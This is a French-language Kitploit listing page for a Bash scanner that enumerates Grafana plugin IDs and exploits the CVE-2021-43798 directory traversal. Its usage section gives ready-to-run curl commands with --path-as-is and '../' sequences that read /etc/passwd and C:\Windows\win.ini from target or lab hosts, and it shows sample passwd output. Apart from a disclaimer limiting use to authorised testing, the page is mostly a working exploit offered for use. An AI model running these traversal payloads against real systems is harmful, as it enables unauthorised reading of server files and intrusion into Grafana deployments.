Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — Scanner basé sur Bash qui énumère les ID de plugins Grafana et teste la traversée de répertoire CVE-2021-43798 en tentant de lire /etc/passwd ou win.ini sur les instances vulnérables. | Kitploit
Outils/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
Scanners de VulnérabilitésScanners de Vulnérabilités WebExploitationScripting et AutomatisationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Scanner basé sur Bash qui énumère les ID de plugins Grafana et teste la traversée de répertoire CVE-2021-43798 en tentant de lire /etc/passwd ou win.ini sur les instances vulnérables.

Voir le dépôt
1il y a 14h 15mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Énumérateur de plugins Grafana CVE-2021-43798

Un petit outil en Bash pour tester les instances Grafana pour CVE-2021-43798, une vulnérabilité de traversée de répertoire affectant les versions vulnérables de Grafana.

L'outil énumère les identifiants de plugins Grafana et utilise curl --path-as-is pour tester si la traversée de répertoire peut accéder à un fichier connu.

Pour les tests de sécurité autorisés et les environnements de laboratoire uniquement.

Fichiers

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh : Teste l'accès à C:\Windows\win.ini
  • grafana-linux.sh : Teste l'accès à /etc/passwd
  • : Une liste de mots contenant les identifiants de plugins Grafana utilisés lors de l'énumération.
plugins.txt

Prérequis

  • Bash
  • curl
  • Une cible Grafana
  • L'autorisation de tester la cible

Vérifiez que curl est installé :

root@kitploit:~
curl --version

Rendez les scripts exécutables :

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

Aperçu de CVE-2021-43798

CVE-2021-43798 est une vulnérabilité de traversée de répertoire dans Grafana.

Le point de terminaison vulnérable est basé sur : /public/plugins/<plugin-id>/

La vulnérabilité peut permettre une traversée en dehors du répertoire de plugins prévu.

Le point important lors des tests avec curl est : --path-as-is

Sans cette option, le client peut normaliser le chemin avant de l'envoyer au serveur.

Scanner Windows

Le scanner Windows tente de récupérer : C:\Windows\win.ini

Le chemin est représenté dans la requête HTTP comme : Windows/win.ini

Utilisation de base

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Exemple :

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Test manuel Windows

Vous pouvez tester manuellement un plugin avec :

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Pour la cible de laboratoire :

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Une réponse réussie devrait contenir le contenu du fichier INI Windows.

Scanner Linux

Le scanner Linux tente de récupérer : /etc/passwd

Utilisation de base

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Exemple générique :

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Test manuel Linux

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Pour la cible de laboratoire :

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Une réponse Linux réussie devrait contenir des entrées similaires à :

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

Options de ligne de commande

Les deux scanners utilisent les mêmes arguments de base :

  • u, --url : URL de base de Grafana
  • w, --wordlist : Liste de mots de plugins
  • f, --file : Fichier à tester
  • h, --help : Afficher l'aide
Télécharger l’outil